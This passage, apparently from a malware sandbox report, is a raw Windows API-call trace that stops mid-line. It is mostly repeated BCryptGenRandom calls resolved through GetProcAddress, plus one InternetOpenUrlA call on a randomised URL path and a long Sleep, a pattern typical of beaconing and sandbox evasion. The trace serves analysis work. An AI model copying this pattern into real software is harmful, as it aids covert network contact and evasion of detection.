BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0274.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e65, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x4d5e65) returned 0x0 [0274.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0274.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0274.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0274.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0274.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0274.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e89, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x4d5e89) returned 0x0 [0274.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.965] GetProcessHeap () returned 0x440000 [0274.965] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0274.965] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0274.965] lstrcatA (in: lpString1="\x04", lpString2="/idhx9bovrirjam0b4ho2i6Zb/lfj74o45udccpmq6gb1duLgeqw0cBt9f0vrrLhyfwm/35Td8xmvNFT14cw9e0gisif8ltvW84w6ek3/dbnGbyuf229iRuurty7h/" | out: lpString1="\x04/idhx9bovrirjam0b4ho2i6Zb/lfj74o45udccpmq6gb1duLgeqw0cBt9f0vrrLhyfwm/35Td8xmvNFT14cw9e0gisif8ltvW84w6ek3/dbnGbyuf229iRuurty7h/") returned="\x04/idhx9bovrirjam0b4ho2i6Zb/lfj74o45udccpmq6gb1duLgeqw0cBt9f0vrrLhyfwm/35Td8xmvNFT14cw9e0gisif8ltvW84w6ek3/dbnGbyuf229iRuurty7h/" [0274.965] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0274.965] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/idhx9bovrirjam0b4ho2i6Zb/lfj74o45udccpmq6gb1duLgeqw0cBt9f0vrrLhyfwm/35Td8xmvNFT14cw9e0gisif8ltvW84w6ek3/dbnGbyuf229iRuurty7h/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0274.965] GetProcessHeap () returned 0x440000 [0274.965] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0274.965] GetProcessHeap () returned 0x440000 [0274.965] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0274.966] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0274.966] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0274.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0274.966] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0274.966] Sleep (dwMilliseconds=0x15b93) [0275.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0275.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.112] GetProcessHeap () returned 0x440000 [0275.112] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f53b0 [0275.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f53b1, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x4f53b1) returned 0x0 [0275.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0275.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.129] GetProcAddress (hModule=0x7ffc5bcc0000, 